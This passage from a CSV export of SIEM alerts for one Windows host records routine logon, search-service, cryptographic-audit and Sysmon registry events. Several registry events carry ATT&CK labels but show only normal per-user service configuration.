Impersonation + +New Logon: + Security ID: S-1-5-18 + Account Name: SYSTEM + Account Domain: NT AUTHORITY + Logon ID: 0x3E7 + Linked Logon ID: 0x0 + Network Account Name: - + Network Account Domain: - + Logon GUID: {00000000-0000-0000-0000-000000000000} + +Process Information: + Process ID: 0x24c + Process Name: C:\Windows\System32\services.exe + +Network Information: + Workstation Name: - + Source Network Address: - + Source Port: - + +Detailed Authentication Information: + Logon Process: Advapi + Authentication Package: Negotiate + Transited Services: - + Package Name (NTLM only): - + Key Length: 0 + +This event is generated when a logon session is created. It is generated on the computer that was accessed. + +The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe. + +The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network). + +The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on. + +The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases. + +The impersonation level field indicates the extent to which a process in the logon session can impersonate. + +The authentication information fields provide detailed information about this specific logon request. + - Logon GUID is a unique identifier that can be used to correlate this event with a KDC event. + - Transited services indicate which intermediate services have participated in this logon request. + - Package name indicates which sub-protocol was used among the NTLM protocols. + - Key length indicates the length of the generated session key. This will be 0 if no session key was requested.""" +"Apr 26, 2020 @ 10:15:53.284",3,"The Windows Search Service started",,"""The Windows Search Service started. +""" +"Apr 26, 2020 @ 10:15:53.256",3,"The database engine attached a database",,"""SearchIndexer (4212,D,50) Windows: The database engine attached a database (1, C:\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb). (Time=0 seconds) + +Saved Cache: 0 0 +Additional Data: lgposAttach = 00000014:000D:0268, +dbv = 1568.20.0 + +Internal Timing Sequence: +[1] 0.000007 +J(0) +M(C:0K, Fs:1, WS:4K # 0K, PF:0K # 0K, P:0K) +[2] 0.000533 -0.000242 (1) WT +J(0) +M(C:0K, Fs:26, WS:36K # 0K, PF:32K # 0K, P:32K) +[3] 0.019551 -0.014157 (6) WT +J(CM:0, PgRf:0, Rd:0/0, Dy:0/0, Lg:3480/2) +M(C:0K, Fs:43, WS:132K # 0K, PF:148K # 0K, P:148K) +[4] 0.000143 +J(0) +[5] - +[6] - +[7] - +[8] 0.002402 -0.001095 (2) CM +J(CM:2, PgRf:2, Rd:14/2, Dy:0/0, Lg:0/0) +M(C:0K, Fs:53, WS:208K # 0K, PF:664K # 0K, P:664K) +[9] 0.034636 -0.000268 (5) CM -0.033900 (2) WT +J(CM:5, PgRf:23, Rd:0/5, Dy:0/0, Lg:0/0) +M(C:0K, Fs:67, WS:268K # 0K, PF:256K # 140K, P:256K) +[10] 0.000219 -0.000091 (1) CM +J(CM:1, PgRf:40, Rd:0/1, Dy:0/0, Lg:0/0) +M(C:0K, Fs:11, WS:44K # 16K, PF:96K # 96K, P:96K) +[11] 0.000016 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:4, WS:16K # 16K, PF:0K # 0K, P:0K) +[12] 0.000046 +J(CM:0, PgRf:42, Rd:0/0, Dy:0/0, Lg:0/0) +M(C:0K, Fs:3, WS:12K # 12K, PF:0K # 0K, P:0K) +[13] 0.000001 +J(0) +[14] 0.0 +J(0) +[15] 0.000006 +J(CM:0, PgRf:1, Rd:0/0, Dy:0/0, Lg:0/0).""" +"Apr 26, 2020 @ 10:15:53.178",3,"The database engine is starting a new instance",,"""SearchIndexer (4212,P,98) Windows: The database engine (10.00.18363.0000) is starting a new instance (0).""" +"Apr 26, 2020 @ 10:15:51.059",9,"Benchmark for Windows audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from 'not applicable' to failed",, +"Apr 26, 2020 @ 10:15:50.170",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:50.121",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:50.090",5,"Windows audit failure event",,"""Cryptographic operation. + +Subject: + Security ID: S-1-5-21-438079597-2123118846-2669748851-1001 + Account Name: John Williams + Account Domain: DESKTOP-HUE026H + Logon ID: 0x37383 + +Cryptographic Parameters: + Provider Name: Microsoft Software Key Storage Provider + Algorithm Name: UNKNOWN + Key Name: Microsoft Connected Devices Platform device certificate + Key Type: User key. + +Cryptographic Operation: + Operation: Open Key. + Return Code: 0x80090016""" +"Apr 26, 2020 @ 10:15:49.863",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.734923100Z"",""eventRecordID"":""852"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.717\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\TabletInputService\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.717"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\TabletInputService\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.717 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\TabletInputService\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:49.050",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.291850300Z"",""eventRecordID"":""846"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:49.003",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.291552300Z"",""eventRecordID"":""845"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\WpnUserService_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\WpnUserService_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\WpnUserService_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 10:15:48.931",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.290429400Z"",""eventRecordID"":""844"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.913",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.290092500Z"",""eventRecordID"":""843"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UserDataSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UserDataSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UserDataSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.893",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.288557000Z"",""eventRecordID"":""842"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\System32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\System32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\ImagePath +Details: C:\Windows\System32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.871",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.288233000Z"",""eventRecordID"":""841"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\UnistoreSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\UnistoreSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\UnistoreSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.827",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.286809000Z"",""eventRecordID"":""840"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k PrintWorkflow\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k PrintWorkflow""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k PrintWorkflow""" +"Apr 26, 2020 @ 10:15:48.799",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.286440300Z"",""eventRecordID"":""839"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PrintWorkflowUserSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PrintWorkflowUserSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PrintWorkflowUserSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.784",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.284273500Z"",""eventRecordID"":""838"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.773",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.283744800Z"",""eventRecordID"":""837"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\PimIndexMaintenanceSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000003)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PimIndexMaintenanceSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000003)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_3ddcb\Start +Details: DWORD (0x00000003)""" +"Apr 26, 2020 @ 10:15:48.754",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.282129300Z"",""eventRecordID"":""836"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ddcb\\ImagePath\r\nDetails: C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ddcb\\\\ImagePath"",""details"":""C:\\\\Windows\\\\system32\\\\svchost.exe -k UnistackSvcGroup""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\ImagePath +Details: C:\Windows\system32\svchost.exe -k UnistackSvcGroup""" +"Apr 26, 2020 @ 10:15:48.729",9,"ATT&CK T1058:Registry edit for new service","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-04-26T10:15:44.281886000Z"",""eventRecordID"":""835"",""processID"":""2200"",""threadID"":""3216"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1031,T1050\r\nEventType: SetValue\r\nUtcTime: 2020-04-26 10:15:44.233\r\nProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000}\r\nProcessId: 588\r\nImage: C:\\Windows\\system32\\services.exe\r\nTargetObject: HKLM\\System\\CurrentControlSet\\Services\\OneSyncSvc_3ddcb\\Start\r\nDetails: DWORD (0x00000002)\""""},""eventdata"":{""ruleName"":""T1031,T1050"",""eventType"":""SetValue"",""utcTime"":""2020-04-26 10:15:44.233"",""processGuid"":""{df9fc3d3-5f46-5ea5-0000-001064a80000}"",""processId"":""588"",""image"":""C:\\\\Windows\\\\system32\\\\services.exe"",""targetObject"":""HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\OneSyncSvc_3ddcb\\\\Start"",""details"":""DWORD (0x00000002)""}}}","""Registry value set: +RuleName: T1031,T1050 +EventType: SetValue +UtcTime: 2020-04-26 10:15:44.233 +ProcessGuid: {df9fc3d3-5f46-5ea5-0000-001064a80000} +ProcessId: 588 +Image: C:\Windows\system32\services.exe +TargetObject: HKLM\System\CurrentControlSet\Services\OneSyncSvc_3ddcb\Start +Details: DWORD (0x00000002)""" +"Apr 26, 2020 @ 